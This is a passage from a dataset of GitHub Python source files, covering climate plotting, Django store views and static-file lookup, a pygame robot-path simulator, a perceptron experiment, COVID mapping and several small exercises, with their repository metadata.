ax2.twinx()\nloc = np.where((data_co2[:,0] >= np.min(year)) & (data_co2[:,0] <= np.max(year)))[0]\nax3.plot(data_co2[loc[0]:loc[-1],0],data_co2[loc[0]:loc[-1],1],'k',linewidth = lnwdth,alpha = 0.75)\n\nax1.set_xlim([1860,2010])\nax1.set_ylim([-0.5,1.2])\nax2.set_ylim([0.0,1])\nax3.set_ylim([150,400])\n\n#plt.show()\nplt.savefig('/home/ph290/Documents/figures/amo_justificatoin.pdf')\n\n\nloc = np.where((year >= 1935) & (year <= 1955))[0]\nloc2 = np.where((year >= 1960) & (year <= 1980))[0]\n\ncube_coll1 = cube[loc].collapsed('time',iris.analysis.MEAN)\ncube_coll2 = cube[loc2].collapsed('time',iris.analysis.MEAN)\n\nplt.figure()\nqplt.contourf(cube_coll2-cube_coll1,50)\nplt.gca().coastlines()\nplt.savefig('/home/ph290/Documents/figures/amo_justification_map.pdf',transparent = True)\n\n","repo_name":"PaulHalloran/desktop_python_scripts","sub_path":"hadcrut4_and_AMO.py","file_name":"hadcrut4_and_AMO.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"38130650073","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
If a copy of the MPL was not distributed with this\n# file, You can obtain one at https://mozilla.org/MPL/2.0/.\n\nfrom pipeline.finders import PipelineFinder\n\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\n\n\nclass LeftoverPipelineFinder(PipelineFinder):\n \"\"\"This finder is expected to come AFTER pipeline.finders.PipelineFinder\n in settings.STATICFILES_FINDERS.\n If a path is looked for here it means it's trying to find a file\n that pipeline.finders.PipelineFinder couldn't find.\n \"\"\"\n\n def find(self, path, all=False):\n # If we're here, the file couldn't be found in any of the other\n # staticfiles finders. Before we raise an error, try to find out where,\n # in the bundles, this was defined. This will make it easier to correct\n # the mistake.\n for config_name in \"STYLESHEETS\", \"JAVASCRIPT\":\n config = settings.PIPELINE[config_name]\n for key, directive in config.items():\n if path in directive[\"source_filenames\"]:\n raise ImproperlyConfigured(\n \"Static file {} can not be found anywhere. Defined in \"\n \"PIPELINE[{!r}][{!r}]['source_filenames']\".format(\n path, config_name, key\n )\n )\n # If the file can't be found AND it's not in bundles, there's\n # got to be something else really wrong.\n raise NotImplementedError(path)\n","repo_name":"mozilla-services/socorro","sub_path":"webapp/crashstats/crashstats/finders.py","file_name":"finders.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":570,"dataset":"github-code","pt":"84"} +{"seq_id":"34568412033","text":"seed_start = 20 # starting y position for first seed line\nseed_length = 300 # length of seed bracket lines\nseed_height = 14 # height of seed text boxes\nseed_offset = 20 # indent of seed text boxes\nmatch_length = 135 # length of match bracket lines\nmatch_height = 14 # height of match text boxes\nmatch_offset = 3 # indent of match text boxes\ninitial_step = 25 # spacing of seed lines, determines vertical\n # size of entire bracket\nscreen_font_size = 8 # font size for bracket on screen\nprint_font_size = 10 # font size for bracket on paper\nprint_heading_size = 12 # font size for paper headings\nprint_margin_x = 10 # print horizontal paper margin in pixels\nprint_margin_y = 30 # print vertical paper margin in pixels\nprint_scores_per_page = 50 # print scores per page\nprint_place_weights_per_page = 6 # print weight place winners per page\nscores_timer_refresh_interval = 30000 # milliseconds between score window refreshes\nhighlight_color = '#FFFFC1' # highlight color for bracket on screen\npopup_color = '#FFFFC1' # popup color for bracket on screen\nmax_name_length = 18 # maximum length of wrestler name\nmax_team_length = 18 # maximum length of team name\nno_scoring_prefix = 'JV' # prefix that defaults wrestler to no scoring\nbout_bitmap_filename = 'WrestlingNerd_wdr/bout.png' # filename of bout sheet image\nicon_filename = 'WrestlingNerd_wdr/nerd16.ico' # filename of the program icon\nlayouts_path = './layouts' # folder holding tournament configurations\nsplash_bitmap_filename = 'WrestlingNerd_wdr/LogoBitmaps_0.png'","repo_name":"parente/wnerd","sub_path":"wnSettings.py","file_name":"wnSettings.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"22633129672","text":"from django.shortcuts import render,get_object_or_404\nfrom .models import *\nfrom django.http import JsonResponse\nimport json\nfrom 
django.views.generic import ListView\nfrom django.db.models import Q\nimport datetime\nfrom .utils import cartData,cookieCart,guestOrder\n# Create your views here.\ndef store_view(request):\n    data = cartData(request)\n    cartitems = data['cartitems']\n\n    context={\n        \"objects\":Product.objects.all(),\n        \"cartitems\":cartitems\n    }\n    return render(request,\"store/products.html\",context)\n\ndef update_item(request):\n    data=json.loads(request.body)\n    productId=data['productId']\n    action=data['action']\n    customer = request.user.customer\n    product=Product.objects.get(id=productId)\n    order,created =Order.objects.get_or_create(customer=customer,complete=False)\n    orderItem,created =OrderItem.objects.get_or_create(order=order,product=product)\n    if action=='add':\n        orderItem.quantity=(orderItem.quantity+1)\n    elif action=='remove':\n        orderItem.quantity = (orderItem.quantity-1)\n\n    orderItem.save()\n    if orderItem.quantity <=0 or action=='delete':\n        orderItem.delete()\n\n    return JsonResponse('item was added', safe=False)\n\ndef update_wishlist(request):\n    data = json.loads(request.body)\n    productId = data['productId']\n    action = data['action']\n    product=Product.objects.get(id=productId)\n    customer=request.user.customer\n    customer.wish_list.add(product)\n    return JsonResponse('item was added',safe=False)\n\ndef cart(request):\n    data = cartData(request)\n    cartitems = data['cartitems']\n    order = data['order']\n    items = data['items']\n\n    context={'items':items,'order':order,'cartitems':cartitems}\n    return render(request,\"store/cart_page.html\",context)\n\n\ndef search_results(request):\n    data = cartData(request)\n    cartitems = data['cartitems']\n\n    if request.method == 'GET':\n        query = request.GET.get('q')\n\n        submitbutton = request.GET.get('submit')\n\n        if query is not None:\n            category=query[0]\n            lookups = Q(title__icontains=query) | Q(category__icontains=category)\n            results = Product.objects.filter(lookups).distinct()\n            count=results.all().count()\n            context = {'object_list': results,\n                       'submitbutton': submitbutton,\n                       'count': count,\n                       'cartitems':cartitems}\n\n            return render(request, 'store/search.html', context)\n\n        else:\n            return render(request, 'store/search.html',{\n            'cartitems':cartitems}\n                          )\n\n    else:\n        return render(request, 'store/search.html', {\n            'cartitems': cartitems})\n\ndef checkout(request):\n    data = cartData(request)\n    cartitems = data['cartitems']\n    order = data['order']\n    items = data['items']\n\n    context = {'items': items, 'order': order,'cartitems':cartitems}\n    return render(request, \"store/checkout1.html\", context)\n\n\ndef product_view(request, id):\n    data = cartData(request)\n    cartitems = data['cartitems']\n    product = get_object_or_404(Product,id=id)\n    context = {\n        'object': product,'cartitems':cartitems\n    }\n    return render(request, \"store/colom.html\", context)\n\ndef processOrder(request):\n    transaction_id=datetime.datetime.now().timestamp()\n    data=json.loads(request.body)\n\n    if request.user.is_authenticated:\n        customer=request.user.customer\n        order, created = Order.objects.get_or_create(\n            customer=customer, complete=False)\n\n    else:\n        customer,order=guestOrder(request,data)\n    total = float(data['form']['total'])\n    order.transaction_id = transaction_id\n    if total == order.get_cart_total:\n        items = order.orderitem_set.all()\n        for item in items:\n            customer.orders.add(item.get_product)\n            product = Product.objects.get(\n                title=item.get_product.title, price=item.get_product.price)\n            product.pieces-=1\n            product.save()\n        order.complete = True\n        order.save()\n        ShippingAddress.objects.create(\n            
customer=customer,\n            order=order,\n            address=data['shipping']['address'],\n            city=data['shipping']['city'],\n            country=data['shipping']['country'],\n            zipcode=data['shipping']['zip']\n        )\n    return JsonResponse('Payment complete',safe=False)\n\ndef customer_service(request):\n    return render(request,\"store/help.html\")\n\ndef tags(request,cat):\n    lookups = Q(category__icontains=cat)\n    results = Product.objects.filter(lookups).distinct()\n    category=results[0].get_category_display\n    data = cartData(request)\n    cartitems = data['cartitems']\n    return render(request,\"store/tags.html\",{\n        'object_list':results,\n        'category':category,\n        'cartitems':cartitems\n    })\ndef unique(list1):\n    list_set=set(list1)\n    unique_list=list(list_set)\n    return unique_list\ndef recommended(request):\n    wishlist = request.user.customer.wish_list.all()\n    x=[]\n    customer=request.user.customer\n    products = Product.objects.all()\n    for item in wishlist:\n        idd=products.get(title=item.title,price=item.price)\n        x.append(idd.category)\n\n    categories=unique(x)\n    for item in products:\n        if item.category in x:\n            customer.recommended.add(item)\n    recommended=customer.recommended.distinct()\n    return render(request,\"store/recommended.html\",{\n        'object_list':recommended\n    })\n\n","repo_name":"abdusamir/Software-Engineering-project","sub_path":"ecommerce/store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"16006209762","text":"#encoding: utf-8\n\n'''\nProblem description\nProblem statement\n\nA snake matrix is the upper triangle of a matrix filled with the natural numbers starting from 1, arranged in order.\n\nSample input\n\n5\n\nSample output\n\n1 3 6 10 15\n\n2 5 9 14\n\n4 8 13\n\n7 12\n\n11\n\nInterface description\n\nPrototype\n\nvoid GetResult(int Num, char * pResult);\n\nInput parameter:\n\n int Num: the input positive integer N\n\nOutput parameter:\n\n int * pResult: pointer to the string buffer holding the snake matrix\n\n the memory region the pointer refers to is guaranteed to be valid\n\nReturn value:\n\n void\n\nInput description:\nA positive integer N (N is at most 100)\n\nOutput description:\nPrint a snake matrix with N rows.\n\nExample 1\nInput\n4\nOutput\n1 3 6 10\n2 5 9\n4 8\n7\n\n'''\n\ndef solution(num):\n    rt = [[0] * num for _ in range(num)]\n    idx = 1\n    for i in range(num):\n        for j in range(0, i+1):\n            rt[i-j][j] = idx\n            idx += 1\n\n    for line in rt:\n        print(' '.join([str(x) for x in line if x != 0]))\n\nif __name__ == '__main__':\n    while True:\n        try:\n            txt = input()\n            if txt == '':\n                break\n            num = int(txt)\n            solution(num)\n        except Exception as e:\n            import traceback\n            traceback.print_exc()\n            break","repo_name":"imsilence/huawei_nowcoder","sub_path":"hj35.py","file_name":"hj35.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"7313700641","text":"# --------------\n# Importing header files\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom scipy.stats import mode \r\n \r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\n\r\n\r\n#Reading file\r\nbank_data = pd.read_csv(path)\r\n\r\n#separating categorical variables from data\r\ncategorical_var = bank_data.select_dtypes(exclude='number')\r\n\r\n#separating numerical variables from data\r\nnumerical_var = bank_data.select_dtypes(include='number')\r\nnumerical_var\r\nprint(categorical_var.shape,numerical_var.shape)\r\n\r\nbanks = bank_data.drop(columns='Loan_ID')\r\n\r\nbank_mode = banks.mode()\r\n\r\n\r\nfor column in banks.columns:\r\n    banks[column].fillna(banks[column].mode()[0], inplace=True)\r\n\r\navg_loan_amount = pd.pivot_table(banks,index=['Gender','Married','Self_Employed'],values='LoanAmount',aggfunc='mean').reset_index()\r\n\r\nloan_stauts_se = banks[(banks['Self_Employed']== 'Yes' 
) & (banks['Loan_Status']=='Y')]\r\n\r\nloan_stauts_nse = banks[(banks['Self_Employed']== 'No' ) & (banks['Loan_Status']=='Y')]\r\n\r\npercentage_se = round((len(loan_stauts_se)/614)*100,2)\r\npercentage_nse = round((len(loan_stauts_nse)/614)*100,2)\r\nprint(percentage_nse,percentage_se)\r\n\r\nloan_term = banks['Loan_Amount_Term'].apply(lambda x : x /12 )\r\nbig_loan_term = []\r\nfor i in loan_term:\r\n if i >= 25 :\r\n big_loan_term.append(i)\r\nprint(len(big_loan_term))\r\n\r\n\r\nmean_values = banks.groupby(['Loan_Status'])['ApplicantIncome','Credit_History'].mean()\r\n\r\nprint(mean_values)\r\n#Code starts here\r\n\r\n\n\n\n","repo_name":"umeshtik3/Greyatoms-Projects","sub_path":"loan_approval_analysis/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"19490230511","text":"import logging\nimport sys\n\nimport pygame\n\nfrom ozobotmapf.graphics.ozomap_drawable import OzomapDrawableParser\nfrom ozobotmapf.simulator.timer import Timer\nfrom ozobotmapf.utils.constants import Colors, Values\n\n\nclass Simulator:\n def __init__(self, ozomap, plans, config):\n self.ozomap = ozomap\n self.plans = plans\n self.config = config\n\n self.timer = Timer()\n # self.timer = Timer(True) # Debug mode timer\n\n self.map_objects = OzomapDrawableParser(ozomap, config).parse()\n self.agents = self.__init_agents()\n\n self.__pygame_init()\n\n def __init_agents(self):\n agents = []\n for agent_id in self.plans:\n agents.append(self.config.agent_class(agent_id, self.plans[agent_id], self.ozomap, self.config))\n\n return agents\n\n def __pygame_init(self):\n logging.info(\"Initializing pygame.\")\n pygame.init()\n pygame.display.set_caption(Values.APP_NAME)\n self.__screen = None\n self.__width, self.__height = self.config.window_width, self.config.window_height\n\n def __init_screen(self):\n logging.info(\"Initializing screen.\")\n if self.config.fullscreen:\n self.__screen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\n else:\n self.__screen = pygame.display.set_mode([self.config.window_width, self.config.window_height])\n self.__screen.fill(Colors.WHITE)\n self.__width, self.__height = pygame.display.get_surface().get_size()\n logging.debug(\"Application window resolution: {} x {} (px)\".format(self.__width, self.__height))\n\n def run(self):\n logging.info(\"Starting the Simulator process.\")\n self.__init_screen()\n\n self.__preview_map()\n self.__wait_for_user()\n\n self.timer.start(self.__get_longest_path_time())\n\n while not self.timer.is_finished():\n self.__handle_events()\n time = self.timer.get_time()\n self.__update_agents(time)\n self.__draw_map().__draw_active_paths()\n self.__update()\n\n self.__wait_for_user()\n\n pygame.quit()\n logging.info(\"Successfully finished the Simulator process.\")\n\n @staticmethod\n def __wait_for_user():\n while True:\n for event in pygame.event.get():\n if (event.type == pygame.QUIT) or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE):\n logging.info(\"Quitting application.\")\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n return\n\n @staticmethod\n def __handle_events():\n for event in pygame.event.get():\n if (event.type == pygame.QUIT) or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE):\n logging.info(\"Quitting application.\")\n pygame.quit()\n sys.exit()\n\n def __draw_map(self):\n self.__screen.fill(Colors.WHITE)\n\n self.map_objects[0].draw(self.__screen) # Agent 
Starts/Ends\n\n if self.config.display_grid:\n self.map_objects[1].draw(self.__screen) # Grid border lines\n\n if self.config.display_walls:\n self.map_objects[2].draw(self.__screen) # Walls\n\n return self\n\n def __draw_all_paths(self):\n for agent in self.agents:\n self.__draw_agent_path(agent)\n\n def __draw_agent_path(self, agent):\n for drawable in agent.get_active_path():\n drawable.draw(self.__screen)\n\n def __update(self):\n pygame.display.update()\n return self\n\n def __preview_map(self):\n self.__draw_map()\n\n if self.config.direction_preview:\n for agent in self.agents:\n if agent.direction_arrow is not None:\n agent.direction_arrow.draw(self.__screen)\n\n self.__update()\n\n def __update_agents(self, time):\n for agent in self.agents:\n agent.update_path(time)\n return self\n\n def __draw_active_paths(self):\n for agent in self.agents:\n agent.get_active_path().draw(self.__screen)\n return self\n\n def __get_longest_path_time(self):\n max_len = 0\n for agent in self.agents:\n p_len = agent.plan_length\n if p_len > max_len:\n max_len = p_len\n return (max_len * self.config.step_time) + self.config.tail_lag\n","repo_name":"EnviloN/ozobot-mapf-simulator","sub_path":"ozobotmapf/simulator/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"3451046245","text":"import logging\n\nfrom datetime import datetime\n\nfrom unicodedata import normalize\n\nfrom helper.io_module import check_file\nfrom helper.io_module import get_absolute_path\n\nfrom pbcore.io import SubreadSet\n\n'''\nRepresents a PacBio SMRT cell. Provides easy methods for accessing sequencing and metadata.\n'''\nclass SmrtCell(object):\n \n '''\n Initializes a new SmrtCell object from a smrtcell xml file\n @param xml_file: the path to a subreadset.xml file of a smrtcell\n '''\n def __init__(self,xml_file):\n self.__logger = logging.getLogger('support.smrtcell')\n self.__is_valid = False\n \n self.__xml_file = check_file(xml_file)\n if not self.__xml_file:\n self.show_log('error', 'XML file '+self.__xml_file+' does not exist or is not a file!')\n return\n \n#TODO: read xml content from encrypted file \n self.__subreadset = None\n try:\n self.__subreadset = SubreadSet(self.__xml_file)\n except IOError as err:\n self.show_log('error', 'Parsing of XML file '+self.__xml_file+' was not successful: '+err+'!')\n return\n \n self.__is_valid = True\n \n\n '''\n Tests if the SmrtCell object is valid.\n @return: return true if the SmrtCell object is valid otherwise false\n @rtype: bool\n ''' \n def is_valid(self):\n return self.__is_valid\n\n '''\n Returns the name of the SmrtCell object.\n @return: the name\n @rtype: str\n ''' \n def get_name(self):\n return self.__subreadset.name if self.__is_valid else None\n\n '''\n Returns the total number of reads in the SmrtCell object.\n @return: the number of reads\n @rtype: integer\n ''' \n def get_total_number_of_reads(self):\n return int(self.__subreadset.metadata.numRecords) if self.__is_valid else None\n\n '''\n Returns the total number of bp in the SmrtCell object.\n @return: the number of bp\n @rtype: integer\n ''' \n def get_total_sum_of_bp(self):\n return int(self.__subreadset.metadata.totalLength) if self.__is_valid else None\n\n '''\n Returns the number of collections ('sequencing runs') in the SmrtCell object.\n Should be 1 in almost all cases. 
If not, all other functions have an optional argument \n to specify the collection.\n @return: the number of sequencing runs\n @rtype: integer\n ''' \n def get_number_of_collections(self):\n return len(self.__subreadset.metadata.collections) if self.__is_valid else None\n \n '''\n Checks if a provided collection index is valid, i.e. can access a collection.\n Do not confuse with collection index.\n @param collection_index: the index of the collection\n @return: true if collection index is valid otherwise false\n @rtype: bool\n ''' \n def check_collection_index(self,collection_index):\n return self.__is_valid and collection_index >= 0 and collection_index \") #set new variable defined by user input\r\n\r\ntxt_again = open(file_again) #same as txt (Line 5)\r\n\r\nprint(txt_again.read()) #prints the text from a user inputted filename\r\n\r\ntxt_again.close() #same as Line 10\r\n","repo_name":"ppapuli/Portfolio","sub_path":"LearnPythonTheHardWay/ex15.py","file_name":"ex15.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"2958445374","text":"import folium\nimport altair as alt\nimport datetime\nimport pandas as pd\nimport numpy as np\n\ndef line_vega(UID, panel):\n # create vega object for attaching plot on marker\n data = panel[panel[\"UID\"] == UID].iloc[0, -7:]\n\n x = [datetime.datetime.strptime(i, '%m/%d/%y') for i in list(data.index)[-7:]]\n x = pd.to_datetime(x).astype(int).astype(int) / 10 ** 6\n y = list(data)\n data2 = pd.DataFrame([x,y],index=[\"Date\", \"Confirmed\"]).transpose()\n\n\n line = alt.Chart(data2).mark_line().encode(\n alt.X('Date:T' , timeUnit='monthdate',axis = alt.Axis(title = 'DATE', format = (\"%b %d\"))), \n alt.Y('Confirmed:Q',axis = alt.Axis(title = 'Number of Cases'))\n ).properties(\n title=f'{panel[panel[\"UID\"] == UID].iloc[0, 5]} county has {int(y[-1])} case.',\n # , {int(y[-1]/ panel[panel[\"UID\"] == UID].iloc[0, -8] * 100 - 100)}% increase in 7 days\n width=300,\n height=200\n )\n\n vega = folium.features.VegaLite(line, width=360, height=250)\n \n return vega\n\n\ndef color_on_quantity(n):\n # color from sharp to pale indicates the sericity\n if n > 10000:\n color=\"red\" \n elif n > 1000:\n color=\"#8B0000\" # pale red\n elif n > 100:\n color=\"#FA8072\"# salmon \n elif n > 10:\n color=\"#FFCE00\"# tangerine \n else:\n color=\"#0A8A9F\" # teal\n return color\n\ndef plot_confirm_counts(data, df_panel):\n\n ## Create map\n\n folium_map = folium.Map(location=[37, -105],\n zoom_start=5,\n tiles=\"CartoDB dark_matter\", # alternative \"OpenStreetMap\"\n width=960, \n height=540)\n \n for index in range(data.shape[0]): # data.shape[0]\n case_info = data.iloc[index, 5:]\n if case_info[2] > 0:\n\n county_name = data.iloc[index, 1]\n \n # radius of circles\n radius = np.log10(case_info[2]*10) * 5\n\n # choose the color of the marker\n color = color_on_quantity(case_info[2])\n\n marker = folium.CircleMarker(location=(case_info[0],case_info[1]),\n radius=radius,\n color=color,\n fill=True)\n \n vega = line_vega(case_info[-1], df_panel)\n\n popup = folium.Popup()\n vega.add_to(popup)\n popup.add_to(marker)\n marker.add_to(folium_map)\n\n \n return folium_map\n","repo_name":"constiny/COVID19","sub_path":"src/mapping_helper.py","file_name":"mapping_helper.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"7162885786","text":"\"\"\"\n2805번 - 
https://www.acmicpc.net/problem/2805\n\n나무 자르기\n\"\"\"\n\nimport sys \ninput = sys.stdin.readline\n\nN, M = map(int, input().split())\ntrees = list(map(int, input().split()))\nlowest, highest = 0, max(trees)\n\nwhile lowest <= highest:\n median, cut_tree = (lowest+highest)//2, 0\n\n for tree in trees:\n if tree > median:\n cut_tree += tree - median\n\n if cut_tree >= M: lowest = median + 1\n else: highest = median - 1\nprint(highest)\n\n\"\"\"\nwhile answer != median:\n median, cut_tree = (lowest+highest)//2, 0\n\n for i in range(N):\n if trees[i] > median:\n cut_tree += trees[i] - median\n\n if cut_tree == M: answer = median\n elif cut_tree > M: lowest = median - 1\n else: highest = median +1\nprint(answer)\n\"\"\"","repo_name":"yehyunsuh/Paper_Review_Algorithm_Study","sub_path":"Baekjoon/Binary Search/2805번 나무 자르기_정답.py","file_name":"2805번 나무 자르기_정답.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"32840224382","text":"import numpy as np\nfrom Perceptron import Perceptron\nfrom NeuralNet import NeuralNet\nimport random\nimport matplotlib.pyplot as plt\n\ntraining_inputs = []\nout_x_c = []\nout_y_c = []\nout_x_f = []\nout_y_f = []\nin_x = []\nin_y = []\n\n\ndef awgn(inp):\n noise = False\n noise_x = 0\n noise_y = 0\n \n if noise:\n noise_x = random.random() - 0.48\n noise_y = random.random() - 0.48\n \n inp[0] += noise_x\n inp[1] += noise_y\n inp.append(abs(inp[0]))\n inp.append(abs(inp[1]))\n return inp\n\n\ndef predict(n, inp, r_w):\n global in_x, in_y, out_x_c, out_y_c, out_x_f, out_y_f\n result = n.predict(inp)\n print(\"Result\", result)\n in_x.append(inp[0])\n in_y.append(inp[1])\n result_coord = convert_to_coordinate(result)\n if result == r_w:\n out_x_c.append(result_coord[0])\n out_y_c.append(result_coord[1])\n else:\n out_x_f.append(result_coord[0])\n out_y_f.append(result_coord[1])\n return\n\n\ndef convert_to_coordinate(inp):\n coord = []\n if inp[0] == 0:\n signx = -1\n else:\n signx = 1\n if inp[1] == 0:\n signy = -1\n else:\n signy = 1\n if inp[2] == 0:\n signx2 = -1\n else:\n signx2 = 1\n if inp[3] == 0:\n signy2 = -1\n else:\n signy2 = 1\n\n coord.append(signx*(1.5+2*inp[2]))\n coord.append(signy*(1.5+2*inp[3]))\n #coord.append(signx*(1.5+2*inp[2]+signx2*(-0.5+inp[4])))\n #coord.append(signy*(1.5+2*inp[3]+signy2*(-0.5+inp[5])))\n return coord\n\n\ntraining_inputs.append(np.array([1, 1, 1, 1]))\ntraining_inputs.append(np.array([2, 2, 2, 2]))\ntraining_inputs.append(np.array([3, 3, 3, 3]))\ntraining_inputs.append(np.array([4, 4, 4, 4]))\n\ntraining_inputs.append(np.array([-1, -1, 1, 1]))\ntraining_inputs.append(np.array([-2, -2, 2, 2]))\ntraining_inputs.append(np.array([-3, -3, 3, 3]))\ntraining_inputs.append(np.array([-4, -4, 4, 4]))\n\ntraining_inputs.append(np.array([1, -1, 1, 1]))\ntraining_inputs.append(np.array([2, -2, 2, 2]))\ntraining_inputs.append(np.array([3, -3, 3, 3]))\ntraining_inputs.append(np.array([4, -4, 4, 4]))\n\ntraining_inputs.append(np.array([-1, 1, 1, 1]))\ntraining_inputs.append(np.array([-2, 2, 2, 2]))\ntraining_inputs.append(np.array([-3, 3, 3, 3]))\ntraining_inputs.append(np.array([-4, 4, 4, 4]))\n\n\nlabels = [[1, 1, 0, 0, 1, 1], [1, 1, 0, 0, 0, 0], [1, 1, 1, 1, 0, 0], [1, 1, 1, 1, 1, 1],\n [0, 0, 0, 0, 1, 1], [0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0], [0, 0, 1, 1, 1, 1],\n [1, 0, 0, 0, 1, 1], [1, 0, 0, 0, 0, 0], [1, 0, 1, 1, 0, 0], [1, 0, 1, 1, 1, 1],\n [0, 1, 0, 0, 1, 1], [0, 1, 1, 0, 0, 0], [0, 1, 1, 1, 0, 0], [0, 1, 1, 1, 1, 1],\n 
]\n\nperceptron1 = Perceptron(4, 1)\nperceptron2 = Perceptron(4, 2)\nperceptron3 = Perceptron(4, 3)\nperceptron4 = Perceptron(4, 4)\nperceptron5 = Perceptron(4, 5)\nperceptron6 = Perceptron(4, 6)\n\nnn = NeuralNet()\n\nnn.add_perceptron(perceptron1)\nnn.add_perceptron(perceptron2)\nnn.add_perceptron(perceptron3)\nnn.add_perceptron(perceptron4)\nnn.add_perceptron(perceptron5)\nnn.add_perceptron(perceptron6)\n\nnn.train(training_inputs, labels)\n\ninputs = np.array(awgn([1, 1]))\nprint(nn.predict(inputs))\n#=> 1\n\ninputs = np.array(awgn([-2, 2]))\nprint(nn.predict(inputs))\n#=> 0\nx = np.linspace(-4, 4, 100)\n\n#Perceptron 1\nb = perceptron1.weights[0]+0.00000000000000000000000000000001\nw1 = perceptron1.weights[1]+0.00000000000000000000000000000001\nw2 = perceptron1.weights[2]+0.000000000000000000000000000001\n\n# print(b, w1, w2)\n\nplt.plot(x, (-(b/w2) / ( b / w1))*x + (-b / w2), label='Perceptron 1')\n\n#Perceptron 2\nb = perceptron2.weights[0]+0.000000000000000000000000000001\nw1 = perceptron2.weights[1]+0.000000000000000000000000000001\nw2 = perceptron2.weights[2]+0.000000000000000000000000000001\n\n# print(b, w1, w2)\n\nplt.plot(x, (-(b/w2) / (b / w1))*x + (-b / w2), label='Perceptron 2')\n\nplt.ylim(-4, 4)\nplt.legend()\nplt.show()\n\n#Perceptron 3\nb = perceptron3.weights[0]\nw1 = perceptron3.weights[3]\nw2 = perceptron3.weights[4]\n\n# print(b, w1, w2)\n\nplt.plot(x, (-(b/w2) / (b / w1))*x + (-b / w2), label='Perceptron 3')\n\n#Perceptron 4\nb = perceptron4.weights[0]\nw1 = perceptron4.weights[3]\nw2 = perceptron4.weights[4]\n\n# print(b, w1, w2)\n\nplt.plot(x, (-(b/w2) / (b / w1))*x + (-b / w2), label='Perceptron 4')\n\n#Perceptron 5\nb = perceptron5.weights[0]\nw1 = perceptron5.weights[1]\nw2 = perceptron5.weights[2]\n\n# print(b, w1, w2)\n\n# plt.plot(x, (-(b/w2) / (b / w1))*x + (-b / w2), label='Perceptron 5')\n\n#Perceptron 6\nb = perceptron6.weights[0]\nw1 = perceptron6.weights[1]\nw2 = perceptron6.weights[2]\n\n# print(b, w1, w2)\n\n# plt.plot(x, (-(b/w2) / (b / w1))*x + (-b / w2), label='Perceptron 6')\n\nplt.legend()\nplt.show()\n\npredict(nn, awgn([2, 2]), [1, 1, 0, 0, 0, 0])\n\nplt.plot(out_x_c, out_y_c, 'gx', label='Correct Predictions')\nplt.plot(out_x_f, out_y_f, 'r+', label='Incorrect Predictions')\nplt.plot(in_x, in_y, 'b.', label='Inputs')\n\n\nplt.title(\"Results\")\nplt.xlim(-5, 5)\nplt.ylim(-5, 5)\nplt.grid()\nplt.show()\n","repo_name":"RobertWalstab/Perceptron","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"15337930212","text":"from flask_script import Manager, Server, Shell\n\nfrom blog.main import bootstrap_app\nfrom blog.model import BaseModel\n\napp = bootstrap_app()\nmanager = Manager(app)\n\n\nmanager.add_command(\"runserver\", Server())\nmanager.add_command(\"shell\", Shell())\n\n\n@manager.command\ndef init_db():\n engine = manager.app.engine\n print('*************************************')\n print('*** Initialized Data Model schema ***')\n print('### *** ###')\n BaseModel.metadata.drop_all(engine)\n BaseModel.metadata.create_all(engine)\n print('*** Data Model schema is initialized successfully ***')\n print('*****************************************************')\n\n\nif __name__ == \"__main__\":\n 
manager.run()\n","repo_name":"lemzoo/rest_api_demo","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"7144822357","text":"import requests\n\nrequest_url = \"https://petstore.swagger.io/v2/pet/findByStatus\"\nparams = {\"status\": \"available\"}\n\nfind_pets_by_status = requests.get(request_url, params=params)\n\npets_array = find_pets_by_status.json()\npets_array = pets_array[:9]\n\npets_names_ids = ''\n\nfor item in pets_array:\n    pets_names_ids += (str(item.get('id')) + ' ' + item.get('name') + '\\n')\n\nprint(pets_names_ids)","repo_name":"lo10-2-1/petstore-api-doc","sub_path":"integration_example.py","file_name":"integration_example.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"7026828364","text":"\nimport pandas as pd\n\ndata = []\n\nwhile True:\n    name = input(\"Write your name please:\")\n    salary = input(\"Write your salary please:\")\n    age = input(\"Write your age please:\")\n    choice = input(\"Do you want to continue adding data to your excel file? Y/N\")\n    data.append([name, salary, age])\n    if choice == \"Y\" or choice == 'y':\n        continue\n    else:\n        break\n\n\n# Column with data for the Excel file\n\nzapis = pd.DataFrame(data, columns=['Imię', 